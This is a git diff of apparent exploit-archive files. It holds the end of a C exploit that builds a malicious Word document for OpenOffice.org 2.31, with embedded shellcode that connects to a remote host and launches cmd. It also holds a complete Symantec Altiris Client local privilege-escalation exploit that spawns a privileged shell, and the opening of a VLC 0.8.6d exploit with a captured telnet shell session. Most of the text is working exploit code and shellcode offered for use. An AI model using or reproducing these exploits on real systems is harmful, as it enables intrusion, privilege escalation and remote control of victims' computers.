+"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00"
+"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00"
+"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00"
+"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00"
+"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00"
+"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00"
+"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00"
+"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00"
+"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00"
+"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00"
+"\x94\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xd5\x00\x00\x00\xd6\x00\x00\x00\xd7\x00\x00\x00\xd8\x00\x00\x00"
+"\xd9\x00\x00\x00\xda\x00\x00\x00\xdb\x00\x00\x00\xfe\xff\xff\xff"
+"\xfd\xff\xff\xff\xfd\xff\xff\xff\xdf\x00\x00\x00\xfe\xff\xff\xff"
+"\xfe\xff\xff\xff\xe2\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
+"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x16\x00\x05\x6d\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00"
+"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x53\x3f\x53"
+"\x31\x1d\xc6\x01\xe1\x00\x00\x00\x40\x02\x00\x00\x00\x00\x00\x00"
+"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00"
+"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00"
+"\x57\x6f\x6f\x6f\x72\x72\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00"
+"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\x00\x00\x00\x00\x00"
+"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00"
+"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xf0"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xd4\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+;
+char file_part9[]=
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x01\x41\x41\x41\x41\xfe\x45\x93\x60\x43\x43\x43\x43\xa8\xef\xff"
+"\xff\xbd\x5c\x91\x60\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
+"\xc0\xa8\x00\xc6\x66\x68\x7a\x51\x66\x53\x89\xe1\x95\x68\xec\xf9"
+"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
+"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
+"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
+"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
+"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
+"\xff\x77\xfc\xff\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x00\x00\x00\x14\x00\x00\x00\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74"
+"\x20\x57\x6f\x72\x64\x20\x31\x30\x2e\x30\x00\x40\x00\x00\x00\x00"
+"\x8c\x86\x47\x00\x00\x00\x00\x40\x00\x00\x00\x00\x46\x4c\x26\x97"
+"\xea\xc3\x01\x40\x00\x00\x00\x00\xea\xff\x56\x9f\x1b\xc6\x01\x40"
+"\x00\x00\x00\x00\xbe\xae\xfd\x65\x1c\xc6\x01\x03\x00\x00\x00\x00"
+;
+
+
+
+int main(int argc, char *argv[]) {
+	FILE* file;
+	char evilbuff[200000];
+	int offset=0;
+
+     printf("[+] Open Office.org 2.31 swriter code execution\n");
+     printf("[+] Marsupilamipowa@hotmail.fr\n");
+	if (argc!=2) {
+		printf("[+] Usage: %s file.doc \n",argv[0]);
+		return 0;
+	}
+
+	memcpy(evilbuff+offset,file_part0,sizeof(file_part0)-1);
+	offset+=sizeof(file_part0)-1;
+	memcpy(evilbuff+offset,file_part1,sizeof(file_part1)-1);
+	offset+=sizeof(file_part1)-1;
+	memcpy(evilbuff+offset,file_part2,sizeof(file_part2)-1);
+	offset+=sizeof(file_part2)-1;
+	memcpy(evilbuff+offset,file_part3,sizeof(file_part3)-1);
+	offset+=sizeof(file_part3)-1;
+	memcpy(evilbuff+offset,file_part4,sizeof(file_part4)-1);
+	offset+=sizeof(file_part4)-1;
+	memcpy(evilbuff+offset,file_part5,sizeof(file_part5)-1);
+	offset+=sizeof(file_part5)-1;
+	memcpy(evilbuff+offset,file_part6,sizeof(file_part6)-1);
+	offset+=sizeof(file_part6)-1;
+	memcpy(evilbuff+offset,file_part7,sizeof(file_part7)-1);
+	offset+=sizeof(file_part7)-1;
+	memcpy(evilbuff+offset,file_part8,sizeof(file_part8)-1);
+	offset+=sizeof(file_part8)-1;
+	memcpy(evilbuff+offset,file_part9,sizeof(file_part9)-1);
+	offset+=sizeof(file_part9)-1;
+
+	/*
+     	At the moment eip gets owned, ebx is controllable. Shellcode is at esp+0xFFFFEFA8.
+	     So first, ADD ESP, EBX then RET and finally PUSH ESP - RET.
+	*/
+	
+	memcpy(evilbuff+0x1c415,"\xFE\x45\x93\x60",4); //ADD ESP, EBX ... RET in tl680mi
+	memcpy(evilbuff+0x1c411,"\xBD\x5C\x91\x60",4); //PUSH ESP - RET in tl680mi
+	memcpy(evilbuff+0x1c40D,"\xA8\xEF\xFF\xFF",4); //value for EBX
+	memcpy(evilbuff+0x1c460,calc,sizeof(calc)-1);
+	
+	if ((file=fopen(argv[1],"wb"))==0) {
+		printf("[-] Unable to access file.\n");
+		return 0;
+	}
+
+	fwrite( evilbuff, 1, offset, file );
+	fclose(file);
+	printf("[+] Done. Have fun!\n");
+	return 0;
+}
+
+// milw0rm.com [2008-05-10]
diff --git a/platforms/windows/local/5625.c b/platforms/windows/local/5625.c
index 817b3444c..ec15ffbf5 100755
--- a/platforms/windows/local/5625.c
+++ b/platforms/windows/local/5625.c
@@ -1,152 +1,152 @@
-// 0day PRIVATE NOT DISTRIBUTE!!!
-//
-// Symantec Altiris Client Service Local Exploit (0day) 
-//
-// Affected Versions	: Altiris Client 6.5.248
-//			  Altiris Client 6.5.299
-//			  Altiris client 6.8.378
-//
-// Alex Hernandez aka alt3kx 
-// ahernandez [at] sybsecurity.com
-//
-// Eduardo Vela aka sirdarckcat 
-// sirdarckcat [at] gmail.com
-//
-// We'll see you soon at ph-neutral 0x7d8
-
-#include "stdio.h"
-#include "windows.h"
-
-int main(int argc, char* argv[])
-{
- HWND lHandle, lHandle2;
- POINT point;
- int id,a=0;
- char langH[255][255];
- char langO[255][255];
- char wname[]="Altiris Client Service";
- 
- strcpy(langH[0x0c],"Aide de Windows");
- strcpy(langH[0x09],"Windows Help");
- strcpy(langH[0x0a],"Ayuda de Windows");
- 
- strcpy(langO[0x0c],"Ouvrir");
- strcpy(langO[0x09],"Open");
- strcpy(langO[0x0a],"Abrir");
- 
- printf("##########################################################\n");
- printf("#                  Altiris Client Service                #\n");
- printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #\n");
- printf("# by sirdarckcat & alt3kx                                #\n");
- printf("#                                                        #\n");
- printf("# This exploit is based on www.milw0rm.com/exploits/350  #\n");
- printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
- printf("# by Cesar Cerrudo                                       #\n");
- printf("##########################################################\n\n");
-  
- id=PRIMARYLANGID(GetSystemDefaultLangID());
- if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
-    printf("Lang not found, using english\n");
-    id=9;
- }
-
- char sText[]="%windir%\\system32\\cmd.ex?";
-
- if (argc<2){
-    printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
-    printf("Look for your LANG-ID here:\n");
-    printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
-    printf("\nAnyway, the program will try to guess it.\n\n");
-    return 0;
- }else{
-    if (argc==2){
-       if (langH[atoi(argv[1])]){
-          id=atoi(argv[1]);
-          printf("Lang changed\n");
-       }else{
-          printf("Lang not supported\n",id);
-       }
-    }
- }
- printf("Using Lang %d\n",id);
- printf("Looking for %s..\n",wname);
- lHandle=FindWindow(NULL, wname);   
- if (!lHandle) {
-  printf("Window %s not found\n", wname);
-  return 0;
- }else{
-  printf("Found! exploiting..\n");
- }
- PostMessage(lHandle,0x313,NULL,NULL);
- 
- Sleep(100);
-
- SendMessage(lHandle,0x365,NULL,0x1);
- Sleep(300);
- pp:
- if (!FindWindow(NULL, langH[id])){
-    printf("Help Window not found.. exploit unsuccesful\n");
-    if (id!=9){
-       printf("Trying with english..\n");
-       id=9;
-       goto pp;
-    }else{
-          return 0;
-    } 
- }else{
-    printf("Help Window found! exploiting..\n");
- } 
- SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
- Sleep(500);
- lHandle = FindWindow("#32770",langO[id]);
- lHandle2 = GetDlgItem(lHandle, 0x47C);
- Sleep(500);
- printf("Sending path..\n");
- SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
- Sleep(800);
- SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
- lHandle2 = GetDlgItem(lHandle, 0x4A0);
- printf("Looking for cmd..\n"); 
- SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
- Sleep(500);
- lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
- lHandle2 = GetDlgItem(lHandle2, 0x1);
- printf("Sending keys..\n");
- SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
- SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
- SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
- Sleep(500);
- mark:
- PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
- Sleep(1000);
- point.x =10; point.y =30;
- lHandle2=WindowFromPoint(point);
-  Sleep(1000);
- printf("Opening shell..\n");
- SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
-  Sleep(1000);
- SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
-  Sleep(1000);
- SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
-  Sleep(1000);
- if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
-    printf("Failed\n");
-    if (!a){
-        a++;
-        goto mark;
-    }
- }else{
-       printf("Done!\n");
- }
- if(!a){
-    SendMessage (lHandle, WM_CLOSE,0,0);
-    Sleep(500);
-    SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
-    SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
- }else{
-    printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
- }
- return 0;
-}
-
-// milw0rm.com [2008-05-15]
+// 0day PRIVATE NOT DISTRIBUTE!!!
+//
+// Symantec Altiris Client Service Local Exploit (0day) 
+//
+// Affected Versions	: Altiris Client 6.5.248
+//			  Altiris Client 6.5.299
+//			  Altiris client 6.8.378
+//
+// Alex Hernandez aka alt3kx 
+// ahernandez [at] sybsecurity.com
+//
+// Eduardo Vela aka sirdarckcat 
+// sirdarckcat [at] gmail.com
+//
+// We'll see you soon at ph-neutral 0x7d8
+
+#include "stdio.h"
+#include "windows.h"
+
+int main(int argc, char* argv[])
+{
+ HWND lHandle, lHandle2;
+ POINT point;
+ int id,a=0;
+ char langH[255][255];
+ char langO[255][255];
+ char wname[]="Altiris Client Service";
+ 
+ strcpy(langH[0x0c],"Aide de Windows");
+ strcpy(langH[0x09],"Windows Help");
+ strcpy(langH[0x0a],"Ayuda de Windows");
+ 
+ strcpy(langO[0x0c],"Ouvrir");
+ strcpy(langO[0x09],"Open");
+ strcpy(langO[0x0a],"Abrir");
+ 
+ printf("##########################################################\n");
+ printf("#                  Altiris Client Service                #\n");
+ printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #\n");
+ printf("# by sirdarckcat & alt3kx                                #\n");
+ printf("#                                                        #\n");
+ printf("# This exploit is based on www.milw0rm.com/exploits/350  #\n");
+ printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
+ printf("# by Cesar Cerrudo                                       #\n");
+ printf("##########################################################\n\n");
+  
+ id=PRIMARYLANGID(GetSystemDefaultLangID());
+ if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
+    printf("Lang not found, using english\n");
+    id=9;
+ }
+
+ char sText[]="%windir%\\system32\\cmd.ex?";
+
+ if (argc<2){
+    printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
+    printf("Look for your LANG-ID here:\n");
+    printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
+    printf("\nAnyway, the program will try to guess it.\n\n");
+    return 0;
+ }else{
+    if (argc==2){
+       if (langH[atoi(argv[1])]){
+          id=atoi(argv[1]);
+          printf("Lang changed\n");
+       }else{
+          printf("Lang not supported\n",id);
+       }
+    }
+ }
+ printf("Using Lang %d\n",id);
+ printf("Looking for %s..\n",wname);
+ lHandle=FindWindow(NULL, wname);   
+ if (!lHandle) {
+  printf("Window %s not found\n", wname);
+  return 0;
+ }else{
+  printf("Found! exploiting..\n");
+ }
+ PostMessage(lHandle,0x313,NULL,NULL);
+ 
+ Sleep(100);
+
+ SendMessage(lHandle,0x365,NULL,0x1);
+ Sleep(300);
+ pp:
+ if (!FindWindow(NULL, langH[id])){
+    printf("Help Window not found.. exploit unsuccesful\n");
+    if (id!=9){
+       printf("Trying with english..\n");
+       id=9;
+       goto pp;
+    }else{
+          return 0;
+    } 
+ }else{
+    printf("Help Window found! exploiting..\n");
+ } 
+ SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
+ Sleep(500);
+ lHandle = FindWindow("#32770",langO[id]);
+ lHandle2 = GetDlgItem(lHandle, 0x47C);
+ Sleep(500);
+ printf("Sending path..\n");
+ SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
+ Sleep(800);
+ SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
+ lHandle2 = GetDlgItem(lHandle, 0x4A0);
+ printf("Looking for cmd..\n"); 
+ SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
+ Sleep(500);
+ lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
+ lHandle2 = GetDlgItem(lHandle2, 0x1);
+ printf("Sending keys..\n");
+ SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
+ SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
+ SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
+ Sleep(500);
+ mark:
+ PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
+ Sleep(1000);
+ point.x =10; point.y =30;
+ lHandle2=WindowFromPoint(point);
+  Sleep(1000);
+ printf("Opening shell..\n");
+ SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
+  Sleep(1000);
+ SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
+  Sleep(1000);
+ SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
+  Sleep(1000);
+ if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
+    printf("Failed\n");
+    if (!a){
+        a++;
+        goto mark;
+    }
+ }else{
+       printf("Done!\n");
+ }
+ if(!a){
+    SendMessage (lHandle, WM_CLOSE,0,0);
+    Sleep(500);
+    SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
+    SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
+ }else{
+    printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
+ }
+ return 0;
+}
+
+// milw0rm.com [2008-05-15]
diff --git a/platforms/windows/local/5667.py b/platforms/windows/local/5667.py
index e82856fb7..4b8344323 100755
--- a/platforms/windows/local/5667.py
+++ b/platforms/windows/local/5667.py
@@ -1,161 +1,161 @@
-#!/usr/bin/python
-#
-# VLC 0.8.6d Double Sh311 Universal Exploit
-# CVE-2007-6681
-# Vulnerability Discovered by Michal Luczaj
-#
-# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
-# and
-# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
-# WE CODED IT JUST FOR FUN ;)
-# Cheers to #offsec and all our firends :) and prelate_ hehe
-#-----------------------------------------------------------------------------
-#
-# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
-#
-# matte@badrobot:~$ telnet 192.168.1.245 4444
-# Trying 192.168.1.245...
-# Connected to 192.168.1.245.
-# Escape character is '^]'.
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Program Files\VideoLAN\VLC>exit
-# exit
-#
-# AT "EXIT" SEH is CALLED and WE OWN EIP AGAIN :P
